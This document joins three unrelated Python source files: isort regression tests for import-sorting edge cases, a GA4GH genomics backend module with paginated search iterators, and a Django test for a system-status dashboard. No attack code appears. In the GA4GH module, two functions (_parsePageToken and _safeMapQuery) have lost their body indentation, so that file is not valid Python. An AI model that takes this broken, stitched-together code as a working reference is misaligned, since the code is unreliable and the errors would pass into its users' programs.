    not insert additional blank lines or headings.
    See: https://github.com/PyCQA/isort/issues/1670.
    """
    snippet = """#!/usr/bin/python3 -ttu
# Standard Library
import argparse
import datetime

import attr
import requests


def foo() -> int:
    print("Hello world")
    return 0


def spam():
    # Standard Library
    import collections
    import logging
"""
    assert (
        isort.code(
            snippet,
            import_heading_stdlib="Standard Library",
        )
        == snippet
    )
def test_isort_shouldnt_add_extra_line_float_to_top_issue_1667():
    """float_to_top must not insert an extra blank line around a skipped
    import that deliberately follows a sys.path manipulation.
    See: https://github.com/PyCQA/isort/issues/1667.
    """
    assert isort.check_code(
        """
import sys

sys.path.insert(1, 'path/containing/something_else/..')

import something_else  # isort:skip

# Some constant
SOME_CONSTANT = 4
""",
        show_diff=True,
        float_to_top=True,
    )
def test_isort_shouldnt_move_noqa_comment_issue_1594():
    """A `# noqa` comment on a long from-import must stay attached to that
    import when it is wrapped, not migrate to a different line.
    See: https://github.com/PyCQA/isort/issues/1594.
    """
    assert (
        isort.code(
            """
from .test import TestTestTestTestTestTest1  # noqa: F401
from .test import TestTestTestTestTestTest2, TestTestTestTestTestTest3, """
            """TestTestTestTestTestTest4, TestTestTestTestTestTest5  # noqa: F401
""",
            profile="black",
        )
        == """
from .test import TestTestTestTestTestTest1  # noqa: F401
from .test import (  # noqa: F401
    TestTestTestTestTestTest2,
    TestTestTestTestTestTest3,
    TestTestTestTestTestTest4,
    TestTestTestTestTestTest5,
)
"""
    )
def test_isort_correctly_handles_unix_vs_linux_newlines_issue_1566():
    """Sorting a CRLF document must give the same result (modulo line
    endings) as sorting the equivalent LF document.
    See: https://github.com/PyCQA/isort/issues/1566.
    """
    import_statement = (
        "from impacket.smb3structs import (\n"
        "SMB2_CREATE, SMB2_FLAGS_DFS_OPERATIONS, SMB2_IL_IMPERSONATION, "
        "SMB2_OPLOCK_LEVEL_NONE, SMB2Create,"
        "\nSMB2Create_Response, SMB2Packet)\n"
    )
    # Same input with Windows-style line endings.
    crlf_statement = import_statement.replace("\n", "\r\n")
    unix_output = isort.code(import_statement, line_length=120)
    windows_output = isort.code(crlf_statement, line_length=120)
    assert unix_output == windows_output.replace("\r\n", "\n")
def test_isort_treats_src_paths_same_as_from_config_as_cli_issue_1711(tmpdir):
    """src_paths given in a config file must be resolved relative to that
    config file, matching the CLI behaviour.
    See: https://github.com/PyCQA/isort/issues/1711.
    """
    # Without any config, `mymodule` is unknown and sorts as first-party
    # below third-party `sqlalchemy`.
    assert isort.check_code(
        """
import mymodule

import sqlalchemy
""",
        show_diff=True,
    )
    config_file = tmpdir.join(".isort.cfg")
    config_file.write(
        """
[settings]
src_paths=
    api
"""
    )
    # Create the `api` source dir so `mymodule` is detected as first-party.
    api_dir = tmpdir.mkdir("api")
    api_dir.join("mymodule.py").write("# comment")
    config = isort.settings.Config(str(config_file))
    assert isort.check_code(
        """
import sqlalchemy

import mymodule
""",
        show_diff=True,
        config=config,
    )
def test_isort_should_never_quietly_remove_imports_in_hanging_line_mode_issue_1741():
    """Hanging-indent wrap mode (multi_line_output=2) must keep every import
    even when a trailing comment forces continuation lines.
    See: https://github.com/PyCQA/isort/issues/1741.
    """
    # Too long for one line: the comment is pushed to a continuation line.
    assert (
        isort.code(
            """
from src import abcd, qwerty, efg, xyz  # some comment
""",
            line_length=50,
            multi_line_output=2,
        )
        == """
from src import abcd, efg, qwerty, xyz \\
    # some comment
"""
    )
    # Exactly fits at line_length=54: no wrapping.
    assert (
        isort.code(
            """
from src import abcd, qwerty, efg, xyz  # some comment
""",
            line_length=54,
            multi_line_output=2,
        )
        == """
from src import abcd, efg, qwerty, xyz  # some comment
"""
    )
    # One character short of fitting: wraps again.
    assert (
        isort.code(
            """
from src import abcd, qwerty, efg, xyz  # some comment
""",
            line_length=53,
            multi_line_output=2,
        )
        == """
from src import abcd, efg, qwerty, xyz \\
    # some comment
"""
    )
    # Very tight limit: imports wrap across lines but all must survive.
    assert (
        isort.code(
            """
from src import abcd, qwerty, efg, xyz  # some comment
""",
            line_length=30,
            multi_line_output=2,
        )
        == """
from src import abcd, efg, \\
    qwerty, xyz \\
    # some comment
"""
    )
@pytest.mark.parametrize("multi_line_output", range(12))
def test_isort_should_never_quietly_remove_imports_in_any_hangin_mode_issue_1741(
    multi_line_output: int,
):
    """Whatever the wrap mode, no import name may be silently dropped.
    See: https://github.com/PyCQA/isort/issues/1741.
    """
    sorted_code = isort.code(
        """
from src import abcd, qwerty, efg, xyz  # some comment
""",
        line_length=30,
        multi_line_output=multi_line_output,
    )
    # Every imported name must still be present in the output.
    assert "abcd" in sorted_code
    assert "qwerty" in sorted_code
    assert "efg" in sorted_code
    assert "xyz" in sorted_code
def test_isort_should_keep_multi_noqa_with_star_issue_1744():
    """`# noqa` comments on star and named imports from the same module must
    all be preserved (and merged sensibly under combine_star).
    See: https://github.com/PyCQA/isort/issues/1744.
    """
    assert isort.check_code(
        """
from typing import *  # noqa
from typing import IO, BinaryIO, Union  # noqa
""",
        show_diff=True,
    )
    assert isort.check_code(
        """
from typing import *  # noqa 1
from typing import IO, BinaryIO, Union  # noqa 2
""",
        show_diff=True,
    )
    assert isort.check_code(
        """
from typing import *  # noqa
from typing import IO, BinaryIO, Union
""",
        show_diff=True,
    )
    assert isort.check_code(
        """
from typing import *
from typing import IO, BinaryIO, Union  # noqa
""",
        show_diff=True,
    )
    # combine_star merges comments, putting `noqa` first.
    assert (
        isort.code(
            """
from typing import *  # hi
from typing import IO, BinaryIO, Union  # noqa
""",
            combine_star=True,
        )
        == """
from typing import *  # noqa; hi
"""
    )
    # Identical `noqa` comments collapse into one.
    assert (
        isort.code(
            """
from typing import *  # noqa
from typing import IO, BinaryIO, Union  # noqa
""",
            combine_star=True,
        )
        == """
from typing import *  # noqa
"""
    )
def test_isort_should_keep_multiple_noqa_comments_force_single_line_mode_issue_1721():
    """Both `# noqa: E501` comments must survive force_single_line wrapping
    of two imports from the same very long module path.
    See: https://github.com/PyCQA/isort/issues/1721.
    """
    assert isort.check_code(
        """
from some_very_long_filename_to_import_from_that_causes_a_too_long_import_row import (  # noqa: E501
    CONSTANT_1,
)
from some_very_long_filename_to_import_from_that_causes_a_too_long_import_row import (  # noqa: E501
    CONSTANT_2,
)
""",
        show_diff=True,
        profile="black",
        force_single_line=True,
    )
def test_isort_should_only_add_imports_to_valid_location_issue_1769():
    """add_imports must be inserted before the code, never inside a multiline
    string expression at the top of the file.
    See: https://github.com/PyCQA/isort/issues/1769.
    """
    assert (
        isort.code(
            '''v = """
""".split(
    "\n"
)
''',
            add_imports=["from __future__ import annotations"],
        )
        == '''from __future__ import annotations

v = """
""".split(
    "\n"
)
'''
    )
    # Degenerate single-line case: empty triple-quoted string assignment.
    assert (
        isort.code(
            '''v=""""""''',
            add_imports=["from __future__ import annotations"],
        )
        == '''from __future__ import annotations

v=""""""
'''
    )
def test_literal_sort_at_top_of_file_issue_1792():
    """An `# isort: unique-list` literal sort directly under the module
    docstring must be sorted and de-duplicated in place.
    See: https://github.com/PyCQA/isort/issues/1792.
    """
    assert (
        isort.code(
            '''"""I'm a docstring! Look at me!"""

# isort: unique-list
__all__ = ["Foo", "Foo", "Bar"]

from typing import final  # arbitrary


@final
class Foo:
    ...


@final
class Bar:
    ...
'''
        )
        == '''"""I'm a docstring! Look at me!"""

# isort: unique-list
__all__ = ['Bar', 'Foo']

from typing import final  # arbitrary


@final
class Foo:
    ...


@final
class Bar:
    ...
'''
    )
def test_isort_should_produce_the_same_code_on_subsequent_runs_issue_1799(tmpdir):
    """isort must be idempotent: sorting already-sorted code with the same
    config must be a no-op.
    See: https://github.com/PyCQA/isort/issues/1799.
    """
    code = """import sys

if sys.version_info[:2] >= (3, 8):
    # TODO: Import directly (no need for conditional) when `python_requires = >= 3.8`
    from importlib.metadata import PackageNotFoundError, version  # pragma: no cover
else:
    from importlib_metadata import PackageNotFoundError, version  # pragma: no cover
"""
    # Reproduce the reporter's full configuration, including custom sections.
    config_file = tmpdir.join(".isort.cfg")
    config_file.write(
        """[isort]
profile=black
src_paths=isort,test
line_length=100
skip=.tox,.venv,build,dist,docs,tests
extra_standard_library=pkg_resources,setuptools,typing
known_test=pytest
known_first_party=ibpt
sections=FUTURE,STDLIB,TEST,THIRDPARTY,FIRSTPARTY,LOCALFOLDER
import_heading_firstparty=internal
import_heading_thirdparty=external
"""
    )
    settings = isort.settings.Config(str(config_file))
    # Sorting once and sorting twice must agree.
    assert isort.code(code, config=settings) == isort.code(
        isort.code(code, config=settings), config=settings
    )
| |
"""
Module responsible for handling protocol requests and returning
responses.
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import json
import random
import ga4gh.datamodel as datamodel
import ga4gh.datamodel.datasets as datasets
import ga4gh.datamodel.references as references
import ga4gh.exceptions as exceptions
import ga4gh.protocol as protocol
def _parsePageToken(pageToken, numValues):
"""
Parses the specified pageToken and returns a list of the specified
number of values. Page tokens are assumed to consist of a fixed
number of integers seperated by colons. If the page token does
not conform to this specification, raise a InvalidPageToken
exception.
"""
tokens = pageToken.split(":")
if len(tokens) != numValues:
msg = "Invalid number of values in page token"
raise exceptions.BadPageTokenException(msg)
try:
values = map(int, tokens)
except ValueError:
msg = "Malformed integers in page token"
raise exceptions.BadPageTokenException(msg)
return values
def _getVariantSet(request, variantSetIdMap):
    """
    Look up the variant set named by request.variantSetId, raising
    VariantSetNotFoundException if it is unknown.
    """
    return _safeMapQuery(
        variantSetIdMap, request.variantSetId,
        exceptionClass=exceptions.VariantSetNotFoundException)
def _safeMapQuery(idMap, id_, exceptionClass=None, idErrorString=None):
"""
Attempt to retrieve a value from a map, throw an appropriate error
if the key is not present
"""
try:
obj = idMap[id_]
except KeyError:
if idErrorString is None:
idErrorString = id_
if exceptionClass is None:
exceptionClass = exceptions.ObjectWithIdNotFoundException
raise exceptionClass(idErrorString)
return obj
class IntervalIterator(object):
    """
    Implements generator logic for types which accept a start/end
    range to search for the object. Returns an iterator over
    (object, pageToken) pairs. The pageToken is a string which allows
    us to pick up the iteration at any point, and is None for the last
    value in the iterator.

    Page tokens have the form "<searchAnchor>:<distanceFromAnchor>":
    the anchor is a start coordinate and the distance counts how many
    already-yielded objects share that start coordinate.

    NOTE(review): this class implements the Python 2 iterator protocol
    only (`next`); a Python 3 port would also need `__next__`.
    """
    def __init__(self, request, containerIdMap):
        self._request = request
        self._containerIdMap = containerIdMap
        # Subclasses resolve the container (read group, variant set, ...).
        self._container = self._getContainer()
        self._searchIterator = None
        # One object of look-ahead (_nextObject) lets next() know whether
        # the current object is the last one (nextPageToken of None).
        self._currentObject = None
        self._nextObject = None
        self._searchAnchor = None
        self._distanceFromAnchor = None
        if request.pageToken is None:
            self._initialiseIteration()
        else:
            # Set the search start point and the number of records to skip from
            # the page token.
            searchAnchor, objectsToSkip = _parsePageToken(request.pageToken, 2)
            self._pickUpIteration(searchAnchor, objectsToSkip)

    def _initialiseIteration(self):
        """
        Starts a new iteration.
        """
        self._searchIterator = self._search(
            self._request.start, self._request.end)
        self._currentObject = next(self._searchIterator, None)
        if self._currentObject is not None:
            self._nextObject = next(self._searchIterator, None)
            self._searchAnchor = self._request.start
            self._distanceFromAnchor = 0
            firstObjectStart = self._getStart(self._currentObject)
            # If the first hit starts after the requested start, anchor on
            # the hit itself so resumed searches can begin there.
            if firstObjectStart > self._request.start:
                self._searchAnchor = firstObjectStart

    def _pickUpIteration(self, searchAnchor, objectsToSkip):
        """
        Picks up iteration from a previously provided page token. There are two
        different phases here:
        1) We are iterating over the initial set of intervals in which start
        is < the search start coorindate.
        2) We are iterating over the remaining intervals in which start >= to
        the search start coordinate.
        """
        self._searchAnchor = searchAnchor
        self._distanceFromAnchor = objectsToSkip
        self._searchIterator = self._search(searchAnchor, self._request.end)
        obj = next(self._searchIterator)
        if searchAnchor == self._request.start:
            # This is the initial set of intervals, we just skip forward
            # objectsToSkip positions
            for _ in range(objectsToSkip):
                obj = next(self._searchIterator)
        else:
            # Now, we are past this initial set of intervals.
            # First, we need to skip forward over the intervals where
            # start < searchAnchor, as we've seen these already.
            while self._getStart(obj) < searchAnchor:
                obj = next(self._searchIterator)
            # Now, we skip over objectsToSkip objects such that
            # start == searchAnchor
            for _ in range(objectsToSkip):
                assert self._getStart(obj) == searchAnchor
                obj = next(self._searchIterator)
        self._currentObject = obj
        self._nextObject = next(self._searchIterator, None)

    def next(self):
        """
        Returns the next (object, nextPageToken) pair.
        """
        if self._currentObject is None:
            raise StopIteration()
        nextPageToken = None
        if self._nextObject is not None:
            start = self._getStart(self._nextObject)
            # If start > the search anchor, move the search anchor. Otherwise,
            # increment the distance from the anchor.
            if start > self._searchAnchor:
                self._searchAnchor = start
                self._distanceFromAnchor = 0
            else:
                self._distanceFromAnchor += 1
            nextPageToken = "{}:{}".format(
                self._searchAnchor, self._distanceFromAnchor)
        # Advance the look-ahead window by one object.
        ret = self._currentObject, nextPageToken
        self._currentObject = self._nextObject
        self._nextObject = next(self._searchIterator, None)
        return ret

    def __iter__(self):
        return self
class ReadsIntervalIterator(IntervalIterator):
    """
    An interval iterator for reads
    """

    def _getContainer(self):
        """Return the single read group named in the request."""
        requestedIds = self._request.readGroupIds
        if len(requestedIds) != 1:
            # Only searches over exactly one read group are implemented;
            # report which constraint was violated.
            if requestedIds:
                msg = "Read search over multiple readGroups not supported"
            else:
                msg = "Read search requires a readGroup to be specified"
            raise exceptions.NotImplementedException(msg)
        return _safeMapQuery(
            self._containerIdMap, requestedIds[0],
            exceptions.ReadGroupNotFoundException)

    def _search(self, start, end):
        """Iterate alignments overlapping [start, end) on the reference."""
        return self._container.getReadAlignments(
            self._request.referenceId, start, end)

    @classmethod
    def _getStart(cls, readAlignment):
        """Start coordinate of an aligned read."""
        return readAlignment.alignment.position.position

    @classmethod
    def _getEnd(cls, readAlignment):
        """End coordinate, derived from the aligned sequence length."""
        return cls._getStart(readAlignment) + len(readAlignment.alignedSequence)
class VariantsIntervalIterator(IntervalIterator):
    """
    An interval iterator for variants
    """

    def _getContainer(self):
        """Resolve the variant set named by the request."""
        return _getVariantSet(self._request, self._containerIdMap)

    def _search(self, start, end):
        """Iterate variants in [start, end) for the requested reference."""
        request = self._request
        return self._container.getVariants(
            request.referenceName, start, end,
            request.variantName, request.callSetIds)

    @classmethod
    def _getStart(cls, variant):
        """Start coordinate of a variant."""
        return variant.start

    @classmethod
    def _getEnd(cls, variant):
        """End coordinate of a variant."""
        return variant.end
class AbstractBackend(object):
    """
    An abstract GA4GH backend.
    This class provides methods for all of the GA4GH protocol end points.
    """
    def __init__(self):
        # id -> datamodel object maps, with parallel sorted id lists that
        # give _topLevelObjectGenerator a deterministic paging order.
        self._referenceSetIdMap = {}
        self._referenceSetIds = []
        self._referenceIdMap = {}
        self._referenceIds = []
        self._requestValidation = False
        self._responseValidation = False
        self._defaultPageSize = 100
        self._maxResponseLength = 2**20  # 1 MiB
        self._datasetIdMap = {}
        self._datasetIds = []

    def setRequestValidation(self, requestValidation):
        """
        Set enabling request validation
        """
        self._requestValidation = requestValidation

    def setResponseValidation(self, responseValidation):
        """
        Set enabling response validation
        """
        self._responseValidation = responseValidation

    def setDefaultPageSize(self, defaultPageSize):
        """
        Sets the default page size for request to the specified value.
        """
        self._defaultPageSize = defaultPageSize

    def setMaxResponseLength(self, maxResponseLength):
        """
        Sets the approximate maximum response length to the specified
        value.
        """
        self._maxResponseLength = maxResponseLength

    def getDatasetIds(self):
        """
        Returns a list of datasets in this backend
        """
        return self._datasetIds

    def getDataset(self, datasetId):
        """
        Returns a dataset with id datasetId
        """
        return _safeMapQuery(
            self._datasetIdMap, datasetId,
            exceptions.DatasetNotFoundException)

    def getReferenceSets(self):
        """
        Returns the list of ReferenceSets in this backend
        """
        return list(self._referenceSetIdMap.values())

    def startProfile(self):
        """
        Profiling hook. Called at the start of the runSearchRequest method
        and allows for detailed profiling of search performance.
        """
        pass

    def endProfile(self):
        """
        Profiling hook. Called at the end of the runSearchRequest method.
        """
        pass

    def validateRequest(self, jsonDict, requestClass):
        """
        Ensures the jsonDict corresponds to a valid instance of requestClass
        Throws an error if the data is invalid
        """
        # Validation is opt-in; see setRequestValidation.
        if self._requestValidation:
            if not requestClass.validate(jsonDict):
                raise exceptions.RequestValidationFailureException(
                    jsonDict, requestClass)

    def validateResponse(self, jsonString, responseClass):
        """
        Ensures the jsonDict corresponds to a valid instance of responseClass
        Throws an error if the data is invalid
        """
        # Validation is opt-in; see setResponseValidation.
        if self._responseValidation:
            jsonDict = json.loads(jsonString)
            if not responseClass.validate(jsonDict):
                raise exceptions.ResponseValidationFailureException(
                    jsonDict, responseClass)

    ###########################################################
    #
    # Iterators over the data hierarchy. These methods help to
    # implement the search endpoints by providing iterators
    # over the objects to be returned to the client.
    #
    ###########################################################

    def _topLevelObjectGenerator(self, request, idMap, idList):
        """
        Generalisation of the code to iterate over the objects at the top
        of the data hierarchy.
        """
        currentIndex = 0
        if request.pageToken is not None:
            # Page tokens for flat lists are a single integer list index.
            currentIndex, = _parsePageToken(request.pageToken, 1)
        while currentIndex < len(idList):
            objectId = idList[currentIndex]
            object_ = idMap[objectId]
            currentIndex += 1
            # The last object carries a nextPageToken of None.
            nextPageToken = None
            if currentIndex < len(idList):
                nextPageToken = str(currentIndex)
            yield object_.toProtocolElement(), nextPageToken

    def datasetsGenerator(self, request):
        """
        Returns a generator over the (dataset, nextPageToken) pairs
        defined by the specified request
        """
        return self._topLevelObjectGenerator(
            request, self._datasetIdMap, self._datasetIds)

    def readGroupSetsGenerator(self, request):
        """
        Returns a generator over the (readGroupSet, nextPageToken) pairs
        defined by the specified request.
        """
        dataset = self.getDataset(request.datasetId)
        return self._topLevelObjectGenerator(
            request, dataset.getReadGroupSetIdMap(),
            dataset.getReadGroupSetIds())

    def referenceSetsGenerator(self, request):
        """
        Returns a generator over the (referenceSet, nextPageToken) pairs
        defined by the specified request.
        """
        return self._topLevelObjectGenerator(
            request, self._referenceSetIdMap, self._referenceSetIds)

    def referencesGenerator(self, request):
        """
        Returns a generator over the (reference, nextPageToken) pairs
        defined by the specified request.
        """
        return self._topLevelObjectGenerator(
            request, self._referenceIdMap, self._referenceIds)

    def variantSetsGenerator(self, request):
        """
        Returns a generator over the (variantSet, nextPageToken) pairs defined
        by the specified request.
        """
        dataset = self.getDataset(request.datasetId)
        return self._topLevelObjectGenerator(
            request, dataset.getVariantSetIdMap(),
            dataset.getVariantSetIds())

    def readsGenerator(self, request):
        """
        Returns a generator over the (read, nextPageToken) pairs defined
        by the specified request
        """
        # Unmapped reads have no reference and are not supported.
        if request.referenceId is None:
            raise exceptions.UnmappedReadsNotSupported()
        if len(request.readGroupIds) != 1:
            raise exceptions.NotImplementedException(
                "Exactly one read group id must be specified")
        compoundId = datamodel.ReadGroupCompoundId.parse(
            request.readGroupIds[0])
        dataset = self.getDataset(compoundId.datasetId)
        intervalIterator = ReadsIntervalIterator(
            request, dataset.getReadGroupIdMap())
        return intervalIterator

    def variantsGenerator(self, request):
        """
        Returns a generator over the (variant, nextPageToken) pairs defined
        by the specified request.
        """
        compoundId = datamodel.VariantSetCompoundId.parse(request.variantSetId)
        dataset = self.getDataset(compoundId.datasetId)
        intervalIterator = VariantsIntervalIterator(
            request, dataset.getVariantSetIdMap())
        return intervalIterator

    def callSetsGenerator(self, request):
        """
        Returns a generator over the (callSet, nextPageToken) pairs defined
        by the specified request.
        """
        if request.name is not None:
            raise exceptions.NotImplementedException(
                "Searching over names is not supported")
        compoundId = datamodel.VariantSetCompoundId.parse(request.variantSetId)
        dataset = self.getDataset(compoundId.datasetId)
        variantSet = _getVariantSet(
            request, dataset.getVariantSetIdMap())
        return self._topLevelObjectGenerator(
            request, variantSet.getCallSetIdMap(),
            variantSet.getCallSetIds())

    ###########################################################
    #
    # Public API methods. Each of these methods implements the
    # corresponding API end point, and return data ready to be
    # written to the wire.
    #
    ###########################################################

    def runGetRequest(self, idMap, id_):
        """
        Runs a get request by indexing into the provided idMap and
        returning a json string of that object
        """
        obj = _safeMapQuery(idMap, id_)
        protocolElement = obj.toProtocolElement()
        jsonString = protocolElement.toJsonString()
        return jsonString

    def runSearchRequest(
            self, requestStr, requestClass, responseClass, objectGenerator):
        """
        Runs the specified request. The request is a string containing
        a JSON representation of an instance of the specified requestClass.
        We return a string representation of an instance of the specified
        responseClass in JSON format. Objects are filled into the page list
        using the specified object generator, which must return
        (object, nextPageToken) pairs, and be able to resume iteration from
        any point using the nextPageToken attribute of the request object.
        """
        self.startProfile()
        try:
            requestDict = json.loads(requestStr)
        except ValueError:
            raise exceptions.InvalidJsonException(requestStr)
        self.validateRequest(requestDict, requestClass)
        request = requestClass.fromJsonDict(requestDict)
        if request.pageSize is None:
            request.pageSize = self._defaultPageSize
        if request.pageSize <= 0:
            raise exceptions.BadPageSizeException(request.pageSize)
        responseBuilder = protocol.SearchResponseBuilder(
            responseClass, request.pageSize, self._maxResponseLength)
        # nextPageToken keeps the value from the last yielded pair; it stays
        # None when the generator yields nothing.
        nextPageToken = None
        for obj, nextPageToken in objectGenerator(request):
            responseBuilder.addValue(obj)
            if responseBuilder.isFull():
                break
        responseBuilder.setNextPageToken(nextPageToken)
        responseString = responseBuilder.getJsonString()
        self.validateResponse(responseString, responseClass)
        self.endProfile()
        return responseString

    def runGetCallset(self, id_):
        """
        Returns a callset with the given id
        """
        compoundId = datamodel.CallSetCompoundId.parse(id_)
        dataset = self.getDataset(compoundId.datasetId)
        # NOTE(review): compoundId stands in for a request object here, so
        # it must expose a .variantSetId attribute — confirm in datamodel.
        variantSet = _getVariantSet(
            compoundId, dataset.getVariantSetIdMap())
        return self.runGetRequest(variantSet.getCallSetIdMap(), id_)

    def runListReferenceBases(self, id_, requestArgs):
        """
        Runs a listReferenceBases request for the specified ID and
        request arguments.
        """
        # parse arguments
        reference = _safeMapQuery(
            self._referenceIdMap, id_,
            exceptions.ObjectWithIdNotFoundException)
        start = 0
        end = datamodel.PysamDatamodelMixin.fastaMax
        if 'start' in requestArgs:
            startString = requestArgs['start']
            try:
                start = int(startString)
            except ValueError:
                raise exceptions.BadRequestIntegerException(
                    'start', startString)
        if 'end' in requestArgs:
            endString = requestArgs['end']
            try:
                end = int(endString)
            except ValueError:
                raise exceptions.BadRequestIntegerException(
                    'end', endString)
        # A page token overrides the start argument.
        if 'pageToken' in requestArgs:
            pageTokenStr = requestArgs['pageToken']
            start = _parsePageToken(pageTokenStr, 1)[0]
        chunkSize = self._maxResponseLength
        # get reference bases
        gbEnd = min(start + chunkSize, end)
        sequence = reference.getBases(start, gbEnd)
        # determine nextPageToken
        if len(sequence) == chunkSize:
            # NOTE(review): this token is an int while other page tokens are
            # strings — confirm the protocol layer serializes it as intended.
            nextPageToken = start + chunkSize
        elif len(sequence) > chunkSize:
            raise exceptions.ServerError()  # should never happen
        else:
            nextPageToken = None
        # build response
        response = protocol.ListReferenceBasesResponse()
        response.offset = start
        response.sequence = sequence
        response.nextPageToken = nextPageToken
        return response.toJsonString()

    # Get requests.

    def runGetReadGroupSet(self, id_):
        """
        Returns a readGroupSet with the given id_
        """
        compoundId = datamodel.ReadGroupSetCompoundId.parse(id_)
        dataset = self.getDataset(compoundId.datasetId)
        return self.runGetRequest(dataset.getReadGroupSetIdMap(), id_)

    def runGetReadGroup(self, id_):
        """
        Returns a read group with the given id_
        """
        compoundId = datamodel.ReadGroupCompoundId.parse(id_)
        dataset = self.getDataset(compoundId.datasetId)
        return self.runGetRequest(dataset.getReadGroupIdMap(), id_)

    def runGetReference(self, id_):
        """
        Runs a getReference request for the specified ID.
        """
        return self.runGetRequest(self._referenceIdMap, id_)

    def runGetReferenceSet(self, id_):
        """
        Runs a getReferenceSet request for the specified ID.
        """
        return self.runGetRequest(self._referenceSetIdMap, id_)

    def runGetVariantSet(self, id_):
        """
        Runs a getVariantSet request for the specified ID.
        """
        compoundId = datamodel.VariantSetCompoundId.parse(id_)
        dataset = self.getDataset(compoundId.datasetId)
        return self.runGetRequest(dataset.getVariantSetIdMap(), id_)

    # Search requests.

    def runSearchReadGroupSets(self, request):
        """
        Runs the specified SearchReadGroupSetsRequest.
        """
        return self.runSearchRequest(
            request, protocol.SearchReadGroupSetsRequest,
            protocol.SearchReadGroupSetsResponse,
            self.readGroupSetsGenerator)

    def runSearchReads(self, request):
        """
        Runs the specified SearchReadsRequest.
        """
        return self.runSearchRequest(
            request, protocol.SearchReadsRequest,
            protocol.SearchReadsResponse,
            self.readsGenerator)

    def runSearchReferenceSets(self, request):
        """
        Runs the specified SearchReferenceSetsRequest.
        """
        return self.runSearchRequest(
            request, protocol.SearchReferenceSetsRequest,
            protocol.SearchReferenceSetsResponse,
            self.referenceSetsGenerator)

    def runSearchReferences(self, request):
        """
        Runs the specified SearchReferenceRequest.
        """
        return self.runSearchRequest(
            request, protocol.SearchReferencesRequest,
            protocol.SearchReferencesResponse,
            self.referencesGenerator)

    def runSearchVariantSets(self, request):
        """
        Runs the specified SearchVariantSetsRequest.
        """
        return self.runSearchRequest(
            request, protocol.SearchVariantSetsRequest,
            protocol.SearchVariantSetsResponse,
            self.variantSetsGenerator)

    def runSearchVariants(self, request):
        """
        Runs the specified SearchVariantRequest.
        """
        return self.runSearchRequest(
            request, protocol.SearchVariantsRequest,
            protocol.SearchVariantsResponse,
            self.variantsGenerator)

    def runSearchCallSets(self, request):
        """
        Runs the specified SearchCallSetsRequest.
        """
        return self.runSearchRequest(
            request, protocol.SearchCallSetsRequest,
            protocol.SearchCallSetsResponse,
            self.callSetsGenerator)

    def runSearchDatasets(self, request):
        """
        Runs the specified SearchDatasetsRequest.
        """
        return self.runSearchRequest(
            request, protocol.SearchDatasetsRequest,
            protocol.SearchDatasetsResponse,
            self.datasetsGenerator)
class EmptyBackend(AbstractBackend):
    """
    A GA4GH backend that contains no data.
    Useful as a stub where a backend instance is required but no
    datasets or references are needed.
    """
class SimulatedBackend(AbstractBackend):
    """
    A GA4GH backend backed by no data; used mostly for testing
    """
    def __init__(self, randomSeed=0, numCalls=1, variantDensity=0.5,
                 numVariantSets=1, numReferenceSets=1,
                 numReferencesPerReferenceSet=1, numAlignments=2):
        super(SimulatedBackend, self).__init__()
        # Two simulated datasets sharing the same generation parameters.
        for datasetName in ("simulatedDataset1", "simulatedDataset2"):
            dataset = datasets.SimulatedDataset(
                datasetName, randomSeed, numCalls,
                variantDensity, numVariantSets, numAlignments)
            self._datasetIdMap[dataset.getId()] = dataset
        self._datasetIds = sorted(self._datasetIdMap.keys())
        # Simulated reference sets, each seeded from one shared RNG so the
        # whole backend is reproducible from randomSeed.
        rng = random.Random()
        rng.seed(randomSeed)
        for setIndex in range(numReferenceSets):
            referenceSetId = "referenceSet{}".format(setIndex)
            referenceSet = references.SimulatedReferenceSet(
                referenceSetId, rng.getrandbits(32),
                numReferencesPerReferenceSet)
            self._referenceSetIdMap[referenceSetId] = referenceSet
            for reference in referenceSet.getReferences():
                self._referenceIdMap[reference.getId()] = reference
        self._referenceSetIds = sorted(self._referenceSetIdMap.keys())
        self._referenceIds = sorted(self._referenceIdMap.keys())
class FileSystemBackend(AbstractBackend):
    """
    A GA4GH backend backed by data on the file system
    """
    def __init__(self, dataDir):
        super(FileSystemBackend, self).__init__()
        self._dataDir = dataDir
        # TODO this code is very ugly and should be regarded as a temporary
        # stop-gap until we deal with iterating over the data tree properly.
        # Reference sets live under <dataDir>/references/<setName>/.
        referencesDirName = "references"
        referenceSetDir = os.path.join(self._dataDir, referencesDirName)
        for referenceSetName in os.listdir(referenceSetDir):
            referenceSetPath = os.path.join(referenceSetDir, referenceSetName)
            if not os.path.isdir(referenceSetPath):
                continue
            referenceSet = references.HtslibReferenceSet(
                referenceSetName, referenceSetPath)
            self._referenceSetIdMap[referenceSet.getId()] = referenceSet
            for reference in referenceSet.getReferences():
                self._referenceIdMap[reference.getId()] = reference
        self._referenceSetIds = sorted(self._referenceSetIdMap.keys())
        self._referenceIds = sorted(self._referenceIdMap.keys())
        # Datasets: every sibling directory except the references dir.
        for entryName in os.listdir(self._dataDir):
            entryPath = os.path.join(self._dataDir, entryName)
            if os.path.isdir(entryPath) and entryName != referencesDirName:
                dataset = datasets.FileSystemDataset(entryPath)
                self._datasetIdMap[dataset.getId()] = dataset
        self._datasetIds = sorted(self._datasetIdMap.keys())
| |
# coding: utf-8
"""
informer tests for views
"""
import mock
import json
import pytest
from django.test import TestCase, Client
from informer.models import Raw
from informer.factories import RawFactory
pytestmark = pytest.mark.django_db
class DefaultViewTest(TestCase):
    """
    Tests to Default View
    """

    @mock.patch('celery.app.control.Control.inspect')
    def test_get(self, inspect_mock):
        """
        The dashboard reports every informer as operational when Celery
        workers respond to inspect().stats().
        """
        # BUG FIX: the original used ``mock.stats.return_value``, which sets
        # an attribute on the patched object itself. The view calls
        # ``inspect().stats()``, so the stub must be configured on the result
        # of the call — mirroring test_get_fails below. (The test previously
        # only passed because an unconfigured MagicMock is truthy.)
        inspect_mock().stats.return_value = {'foo': 'bar '}

        client = Client()
        response = client.get('/')

        self.assertEqual(200, response.status_code)

        expected = 'All systems are operational'
        self.assertEqual(response.context['status'], expected)

        # One entry per registered informer, all operational.
        expected = [
            {
                'name': 'database',
                'operational': True,
                'message': 'Your database is operational.',
                'url': '/database/'
            },
            {
                'name': 'postgres',
                'operational': True,
                'message': 'Your database is operational.',
                'url': '/postgres/'
            },
            {
                'name': 'storage',
                'operational': True,
                'message': 'Your FileSystemStorage is operational.',
                'url': '/storage/'
            },
            {
                'name': 'celery',
                'operational': True,
                'message': 'Celery is operational.',
                'url': '/celery/'
            },
            {
                'name': 'cache',
                'operational': True,
                'message': 'Your cache system is operational.',
                'url': '/cache/'
            }
        ]
        self.assertEqual(response.context['result'], expected)

